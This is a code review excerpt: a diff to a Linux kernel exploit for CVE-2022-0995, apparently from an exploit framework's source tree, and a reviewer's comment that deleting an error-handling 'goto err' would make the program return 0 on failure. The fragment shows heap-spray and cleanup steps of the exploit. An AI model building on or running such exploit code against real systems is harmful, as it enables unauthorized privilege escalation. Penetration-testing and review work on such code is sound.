external/source/exploits/cve-2022-0995/cve-2022-0995.c

```diff
@@ -460,18 +422,12 @@ int main(int argc, char* argv[]) {
 
   spray_skbuff(ss, secondary_buf, sizeof(secondary_buf));
 
-  puts("[+] Cleaning up msg_msgs");
   cleanup_msgmsg();
 
-  puts("[+] Releasing pipe_buffer objs");
   for (int i = 0; i < NUM_PIPEFDS; i++) {
     if (close(pipe_fds[i][0]) < 0) {
-      perror("[-] close");
-      goto err;
```

Comment:
Um pretty sure we want to keep these here so that we return 1 instead of returning 0?